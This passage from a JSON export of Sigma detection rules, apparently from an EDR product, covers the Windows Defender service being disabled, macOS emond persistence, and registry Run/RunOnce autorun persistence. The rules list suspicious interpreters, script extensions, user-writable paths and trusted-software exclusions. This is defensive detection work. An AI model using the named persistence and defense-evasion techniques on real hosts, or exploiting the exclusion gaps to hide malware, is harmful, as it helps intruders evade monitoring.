\"MpCmdRun.exe -DisableService\" when a third party antivirus is installed\n exclusion_services1:\n ProcessOriginalFileName: 'services.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n ProcessUserSID: 'S-1-5-18'\n exclusion_services2:\n ProcessImage|endswith: '?:\\Windows\\System32\\services.exe'\n ProcessParentImage: '?:\\Windows\\System32\\wininit.exe'\n ProcessUserSID: 'S-1-5-18'\n\n exclusion_msiexec:\n ProcessImage: '?:\\Windows\\System32\\msiexec.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n Details: 'DWORD (0x00000003)'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "96d7e124-2dc0-4aca-b39d-6f7c5a29e1c5",
"rule_name": "Windows Defender Service Disabled",
"rule_description": "Detects the Windows Defender service (WinDefend) being disabled via registry.\nAdversaries may disable Windows Defender service to avoid possible detection of their malicious activities.\nIt is recommended to analyze the process responsible for the registry modification as well as to look for other suspicious actions on the host.\n",
"rule_creation_date": "2021-05-27",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "96f7f46a-fd19-45fe-b544-2d1c3ef8e50b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.598408Z",
"creation_date": "2026-03-23T11:45:34.598411Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.598419Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.xorrior.com/emond-persistence/",
"https://attack.mitre.org/techniques/T1546/014/"
],
"name": "t1546_014_emond_persistence_created_modified.yml",
"content": "title: Suspicious Emond Persistence Installed or Modified\nid: 96f7f46a-fd19-45fe-b544-2d1c3ef8e50b\ndescription: |\n Detects the creation or modification of a suspicious process by the Event monitor Daemon (emond)\n Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.\n It is recommended to check that the newly created process is legitimate.\nreferences:\n - https://www.xorrior.com/emond-persistence/\n - https://attack.mitre.org/techniques/T1546/014/\ndate: 2024/06/18\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546.014\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.Persistence\nlogsource:\n product: macos\n category: filesystem_event\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n selection_files:\n - Path|startswith:\n - '/private/etc/emond.d/rules/'\n - '/private/var/db/emondClients/'\n - '/System/Library/LaunchDaemons/com.apple.emond.plist'\n - TargetPath|startswith:\n - '/private/etc/emond.d/rules/'\n - '/private/var/db/emondClients/'\n - '/System/Library/LaunchDaemons/com.apple.emond.plist'\n is_read:\n Kind: 'read'\n\n condition: all of selection_* and not is_read\nlevel: medium\n#level: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "96f7f46a-fd19-45fe-b544-2d1c3ef8e50b",
"rule_name": "Suspicious Emond Persistence Installed or Modified",
"rule_description": "Detects the creation or modification of a suspicious process by the Event monitor Daemon (emond)\nAdversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.\nIt is recommended to check that the newly created process is legitimate.\n",
"rule_creation_date": "2024-06-18",
"rule_modified_date": "2025-01-20",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1546.014"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "970dca0d-7bda-4ab7-a60c-a23fa59e6627",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620588Z",
"creation_date": "2026-03-23T11:45:34.620590Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620595Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/",
"https://attack.mitre.org/techniques/T1547/001/"
],
"name": "t1547_001_persistence_registry_asep.yml",
"content": "title: Registry Autorun Key Added\nid: 970dca0d-7bda-4ab7-a60c-a23fa59e6627\ndescription: |\n Detects when a suspicious entry is added or modified in one of the autostart extensibility points (ASEP) in the registry, which may indicate an attempt to establish persistence.\n Autostart extensibility points are registry locations that Windows uses to automatically execute programs during system startup or user logon. Common ASEP locations include Run and RunOnce keys under \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\" and \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\". Attackers frequently abuse these registry keys to achieve persistence by adding entries that reference malicious executables, scripts, or commands. This technique allows malware to survive system reboots and maintain a foothold on the compromised system without requiring user interaction.\n It is recommended to investigate the process that created or modified the registry key, examine the target executable or command referenced in the registry value and verify whether the entry corresponds to legitimate software.\nreferences:\n - https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/\n - https://attack.mitre.org/techniques/T1547/001/\ndate: 2020/09/24\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|contains:\n # run keys (run / runonce / runonceex / runservices / runservicesonce )\n - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\'\n # covers RunOnce and RunOnce\\Setup\n - '\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\'\n # covers RunOnceEx\\000x\\value and RunOnceEx\\000x\\Depend\\value\n - '\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\'\n\n # This is handled by the rule fd2e4d65-00d6-4661-a5f4-ad92fe8d4540\n filter_suspicious:\n - Details|contains:\n - 'rundll32.exe'\n - 'pwsh.exe'\n - 'powershell.exe'\n - 'cmd.exe'\n - 'mshta.exe'\n - 'wscript.exe'\n - 'cscript.exe'\n - '\\AppData\\Roaming\\'\n - '\\Users\\Public\\'\n - '\\Users\\Default\\'\n - '\\PerfLogs\\'\n - Details|endswith:\n # wscript\n - '.js'\n - '.jse'\n - '.vbs'\n - '.vbe'\n - '.vb'\n - '.vba'\n - '.wsf'\n - '.wsh'\n # mshta\n - '.hta'\n # powershell\n - '.ps1'\n - '.psc1'\n - '.psm1'\n - '.psd1'\n # misc, behaves like .exe but uncommon\n - '.cmd'\n - '.com'\n - '.pif'\n - '.scr'\n\n filter_innocent_values:\n Details:\n - 'DWORD (0x00000000)'\n - 'DWORD (0x00000001)'\n - '\"\"'\n - '1'\n - '(Empty)'\n - ' '\n\n # This is handled by the rule 907e5765-e7f7-4b8f-886c-749bf315fe52\n filter_remote:\n ProcessCommandLine:\n - '?:\\WINDOWS\\system32\\svchost.exe -k localService -p -s RemoteRegistry'\n - '?:\\Windows\\system32\\svchost.exe -k LocalService'\n - '?:\\Windows\\system32\\svchost.exe -k regsvc'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_harfanglab:\n Details:\n - '?:\\ProgramData\\HarfangLab\\ui\\hurukai-ui.exe --no-open'\n - '\"?:\\ProgramData\\HarfangLab\\ui\\hurukai-ui.exe\" --no-open'\n\n # HKU\\S-1-5-21-948834541-...HKU\\S-1-5-21-948834541-1531591341-313593124-37104\\Software\\Microsoft\\Windows\\CurrentVersion\\Group Policy Objects\\FILHETALLARD.COM{3A3A79CC-4140-4224-A5B6-382E203215F9}User\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\**delvals.XXXXX{3A3A79CC-4140-4224-bbbb-aaaaaaaa}User\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\**delvals.\n exclusion_gpo_path:\n Image: '?:\\Windows\\System32\\mmc.exe'\n TargetObject|contains: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Group Policy Objects\\'\n\n # We have a specific rule for that\n exclusion_loadappinit:\n TargetObject:\n - 'HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\LoadAppInit_DLLs'\n - 'HKLM\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\LoadAppInit_DLLs'\n\n exclusion_programfiles:\n # to avoid a lot of FP, we WL everything that is set to be launched from program files\n # attackers rarely set a foot here, and they need admin privileges to do so anyway\n - Details|contains:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n - '%ProgramFiles%\\'\n - '?:\\PROGRA~2\\'\n - Image|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n - '?:\\PROGRA~2\\'\n\n exclusion_system_folder:\n - Details|contains:\n - '%windir%\\System32\\'\n - '%windir%\\Syswow64\\'\n - '%windir%\\Speech\\'\n - '%windir%\\dwrcs\\'\n - '%systemroot%\\System32\\'\n - '%systemroot%\\Syswow64\\'\n - '%systemroot%\\Speech\\'\n - '%systemroot%\\dwrcs\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\Syswow64\\'\n - '?:\\Windows\\Speech\\'\n - '?:\\windows\\dwrcs\\'\n - ProcessParentImage|startswith: '?:\\Windows\\SoftwareDistribution\\'\n\n exclusion_known_programdata:\n Details|contains:\n - '?:\\ProgramData\\Lenovo\\'\n - '?:\\ProgramData\\bomgar-scc'\n - '?:\\ProgramData\\citrix\\'\n - '?:\\ProgramData\\G Data\\'\n\n exclusion_trusted_signers:\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Airtame ApS'\n - 'Barco N.V.' # ClickShare\n - 'Bitdefender SRL'\n - 'Bluestack Systems, Inc'\n - 'Bomgar Corporation'\n - 'Canva'\n - 'Centile Telecom Applications'\n - 'DeepL GmbH'\n - 'DeepL SE'\n - 'DEEZER SA'\n - 'Dell Inc'\n - 'Dropbox, Inc'\n - 'Facebook, Inc.'\n - 'Google LLC'\n - 'GoTo Technologies USA, LLC'\n - 'InfoCert SpA'\n - 'JetBrains s.r.o.'\n - 'Lenovo'\n - 'LINE Corporation'\n - 'Logitech Inc'\n - 'LogMeIn, Inc.'\n - 'Movavi Software Limited'\n - 'nordvpn s.a.'\n - 'ONELAUNCH TECHNOLOGIES INC.'\n - 'Opera Norway AS'\n - 'Realtek Semiconductor Corp.'\n - 'RingCentral, Inc.'\n - 'Seagull Scientific Inc.'\n - 'Signal Messenger, LLC'\n - 'Symantec Corporation'\n - 'Tixeo SARL'\n - 'Tixeo SAS'\n\n exclusion_drivers:\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\EF694770.srv\n # C:\\WINDOWS\\system32\\spool\\DRIVERS\\x64\\3\\E_YARNMAE.EXE /FU \"?:\\ProgramData\\EPSON\\STM3\\E_S19E9.tmp\"\n Image: '*\\Windows\\System32\\spool\\drivers\\\\*'\n\n exclusion_image:\n Image:\n # c:\\users\\XXX\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe\n - '*\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe'\n - '?:\\Windows\\System32\\StikyNot.exe'\n - '?:\\ProgramData\\McAfee\\Agent\\\\*'\n - '?:\\windows\\temp\\\\????????-????-????-????-????????????\\dismhost.exe'\n - '?:\\\\?WINDOWS.?BT\\Work\\\\????????-????-????-????-????????????\\DismHost.exe'\n - '?:\\windows\\system32\\drvinst.exe'\n - '?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe'\n - '?:\\$WINDOWS.~BT\\Sources\\WindowsUpdateBox.exe'\n\n exclusion_onedrive:\n ProcessOriginalFileName: 'OneDriveSetup.exe'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_onedrive_setup:\n # Image: C:\\Users\\LocalAdmin\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe\n # Command Line C:\\Users\\LocalAdmin\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe /update /restart /updateSource:ODSU /peruser /childprocess /extractFilesWithLessThreadCount /enableExtractCabV2 /renameReplaceOneDriveExe /renameReplaceODSUExe\n # Target Object HKU\\S-1-5-21-3308534374-32794409-4022623240-1105\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Delete Cached Standalone Update Binary\n # Details C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\LocalAdmin\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe\"\n Image|endswith:\n - '\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe'\n - '\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Delete Cached Standalone Update Binary'\n Details|contains: '\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe'\n\n exclusion_windefender:\n Image: '*\\MsMpEng.exe'\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\WindowsDefender'\n Details|endswith: '\\Windows Defender\\MSASCuiL.exe\"' # \"%ProgramFiles%\\Windows Defender\\MSASCuiL.exe\"\n\n exclusion_adobe_flash:\n # C:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_32_0_0_101_pepper.exe\n # C:\\Windows\\System32\\Macromed\\Flash\\FlashUtil32_32_0_0_414_Plugin.exe\n Image:\n - '?:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil*'\n - '?:\\Windows\\system32\\Macromed\\Flash\\FlashUtil*'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\FlashPlayerUpdate'\n\n exclusion_cisco_webex:\n Image|endswith:\n - '\\AppData\\Local\\WebEx\\ciscowebexstart.exe'\n - '\\AppData\\Local\\WebEx\\WebEx\\Applications\\ptsrv.exe'\n - '\\AppData\\Local\\WebEx\\WebexHost.exe'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\CiscoMeetingDaemon'\n\n exclusion_cisco_spark:\n Details|endswith:\n - '\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Webex\\Webex.lnk* /minimized /autostartedWithWindows=true'\n - 'ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Webex\\Webex.lnk* /minimized /autostartedWithWindows=true'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\CiscoSpark'\n\n exclusion_cisco_proximity:\n Details|endswith: '\\AppData\\Roaming\\Cisco\\Proximity\\proximity.exe\" --autostart'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Cisco Proximity'\n\n exclusion_securityhealth:\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\securityhealth'\n # %windir%\\system32\\securityhealthsystray.exe\n Details: '?windir?\\system32\\securityhealthsystray.exe'\n\n exclusion_azure_information_protection:\n Image|endswith: 'AzInfoProtection.exe'\n TargetObject|startswith: 'HKLM\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce'\n Details|contains: 'AzInfoProtection.exe'\n\n exclusion_power_plan_restore:\n Image: '?:\\Windows\\System32\\WinSAT.exe'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\WinSATRestorePower'\n Details|startswith: 'powercfg'\n\n exclusion_teams_install:\n # image : msiexec\n Image: '?:\\Windows\\System32\\msiexec.exe'\n TargetObject: 'HKLM\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\TeamsMachineInstaller'\n Details|contains: 'Teams Installer\\Teams.exe'\n\n exclusion_userinit_ctfmon:\n TargetObject|endswith: 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Runonce\\ctfmon.exe'\n Details|contains: 'ctfmon.exe /n'\n\n exclusion_mspwdregistration:\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\passwordregistration'\n Details: '?:\\windows\\system32\\mspwdregistration.exe'\n\n # chromium, but unsigned\n exclusion_chromium_appdata:\n Image|endswith: '\\AppData\\Local\\chromium\\Application\\chrome.exe'\n Details|contains: '\\AppData\\Local\\chromium\\Application\\chrome.exe'\n TargetObject: '*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\GoogleChromeAutoLaunch_*'\n\n exclusion_msedge_appdata:\n Image|endswith: '\\AppData\\Local\\Microsoft\\Edge\\Application\\msedge.exe'\n Details|contains: '\\AppData\\Local\\Microsoft\\Edge\\Application\\msedge.exe'\n TargetObject: '*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\MicrosoftEdgeAutoLaunch_*'\n\n exclusion_yandex_appdata:\n Image|endswith: '\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe'\n Details|contains: '\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe'\n TargetObject: '*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\GoogleChromeAutoLaunch_*'\n\n exclusion_avast_appdata:\n Image|endswith: '\\AppData\\Local\\AVAST Software\\Browser\\Application\\AvastBrowser.exe'\n Details|contains: '\\AppData\\Local\\AVAST Software\\Browser\\Application\\AvastBrowser.exe'\n TargetObject: '*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\AvastBrowserAutoLaunch_*'\n\n exclusion_citrix_multiple:\n Image: '?:\\Windows\\System32\\msiexec.exe'\n ProcessSignature: 'Microsoft Windows'\n Details|endswith:\n - '\\AppData\\Local\\Citrix\\ICA Client\\concentr.exe\" /startup'\n - '\\AppData\\Local\\Citrix\\ICA Client\\Receiver\\AnalyticsSrv.exe\" /Startup'\n\n exclusion_discord:\n TargetObject|endswith: 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Discord'\n # ?:\\ProgramData\\XXXXX\\Discord\\Update.exe --processStart Discord.exe --process-start-args --start-minimized\n # C:\\Users\\XXXX\\AppData\\Local\\Discord\\Update.exe --processStart Discord.exe\n Details|contains|all:\n - 'Discord\\Update.exe'\n - '--processStart Discord.exe'\n\n exclusion_utorrent:\n TargetObject|endswith:\n - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\uTorrent'\n - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ut' # seen from 2021 ?\n Details|contains: 'AppData\\Roaming\\uTorrent\\uTorrent.exe'\n\n exclusion_viber:\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Viber'\n Details|contains: 'AppData\\Local\\Viber\\Viber.exe'\n\n exclusion_rocketdock:\n Image: '*\\rocketdock\\rocketdock.exe'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\rocketdock'\n\n exclusion_vmware_thaw:\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\symcprovidercleanup'\n Details: '?:\\windows\\post-thaw-script.bat'\n\n exclusion_rtscm:\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\rtscm'\n Details: 'rtscm64.exe'\n\n exclusion_stardock_fences:\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\fences'\n Details|contains: '\\fences.exe /startup'\n\n exclusion_opera:\n Image|endswith: '\\assistant_installer.exe'\n Details|endswith: '\\AppData\\Local\\Programs\\Opera\\assistant\\browser_assistant.exe'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Opera Browser Assistant'\n\n exclusion_opera_launcher:\n Image|endswith:\n - '\\AppData\\Local\\Programs\\Opera\\opera.exe'\n - '\\AppData\\Local\\Programs\\Opera\\\\*\\opera.exe'\n Details|endswith:\n - '\\AppData\\Local\\Programs\\Opera\\launcher.exe'\n - '\\AppData\\Local\\Programs\\Opera\\opera.exe'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Opera Stable'\n\n exclusion_opera_gx:\n Image|endswith: '\\AppData\\Local\\Programs\\Opera GX\\opera.exe'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Opera GX Stable'\n Details|contains: '\\AppData\\Local\\Programs\\Opera GX\\launcher.exe'\n\n exclusion_brave:\n Image: '*\\AppData\\Local\\BraveSoftware\\Brave-Browser\\Application\\brave.exe'\n TargetObject: '*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\GoogleChromeAutoLaunch_????????????????????????????????'\n\n exclusion_braveupdate:\n Image|endswith: '\\BraveUpdate.exe'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\BraveSoftware Update'\n\n exclusion_runonce_known_fp:\n TargetObject:\n - '*\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\\\?????????-????-????-????-?????????????' # one ? at begining and end to match { and }\n - '*\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\RollbackOnline'\n - '*\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\GrpConv'\n - '*\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\InstallShieldSetup'\n - '*\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\DXTempFolder' # DirectX setup\n - '*\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\IM_Resume'\n - '*\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\ ISSetupPrerequisistes' # indeed a space before ISS\n - '*\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\ ISSetupPrerequisistes' # indeed 2 spaces before ISS\n - '*\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\WAB Migrate' # details : %ProgramFiles%\\Windows Mail\\wab.exe /Upgrade\n - '*\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\wextract_cleanup*'\n - '*\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\msedge_cleanup*'\n # HKU\\XXXX\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Application Restart #0 set by csrss.exe\n - '*\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Application Restart *'\n - '*\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\NetworkResetPostReboot' # set by C:\\Windows\\System32\\sdiagnhost.exe / contains \"netsh.exe trace postreset\"\n - '*\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Adobe Speed Launcher' # set by C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeARM.exe\n\n exclusion_run_known_fp:\n TargetObject:\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\ISUSPM'\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\OneDriveSetup'\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\OneDrive'\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\Lync'\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\GrpConv' # (cisco any connect secure mobility client)\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\GoogleDriveFS' # google Drive File Stream\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\Cisco Jabber'\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\Zoom' # Zoom\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\PulseSecure' # VPN pulse secure\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\VUEMUIAgent-Launcher'\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\AdobeAAMUpdater*'\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\F5 Networks VPN Cleanup*'\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\Adobe ARM'\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\PTOneClick'\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\PTIM.exe'\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\Sidebar'\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\Greenshot'\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\AutorunsDisabled\\\\*' # (entries disabled by autoruns)\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\com.squirrel.Teams.Teams' # MS teams\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\TeamsMachineUninstallerLocalAppData' # MS teams\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\TeamsMachineUninstallerProgramData' # MS teams (details %ProgramData%\\Microsoft\\Teams\\Update.exe --uninstall --msiUninstall --source=default)\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\PSUAMain' # Panda antivirus (details \"C:\\Program Files (x86)\\Panda Security\\WAC\\PSUAMain.exe\" /LaunchSysTray )\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\com.squirrel.slack.slack' # slack\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\com.squirrel.lifen.Lifen' # lifen\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Edge Update'\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\RTKUGUI' # ( pointe vers rtkugui64.exe dans system32)\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\DymoQuickPrint'\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\TortoiseSVN Monitor'\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\ISM' # (intel software manager)\n # HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Terminal Server\\Install\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ultracopier\n # HKU\\S-....\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ultracopier\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\ultracopier' # supercopier software\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\Dropbox'\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\Dropbox Update'\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\RtkAudUService' # C:\\Windows\\System32\\DriverStore\\FileRepository\\hdxsstm.inf_amd64_1a1e8196b6801ccf\\RtkAudUService64.exe\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\Spotify' # C:\\Users\\XXXXX\\AppData\\Roaming\\Spotify\\Spotify.exe --autostart --minimized\n - '*\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft.Lists' # C:\\Users\\XXXXX\\AppData\\Local\\Microsoft\\OneDrive\\21.180.0905.0007\\Microsoft.SharePoint.exe\n - 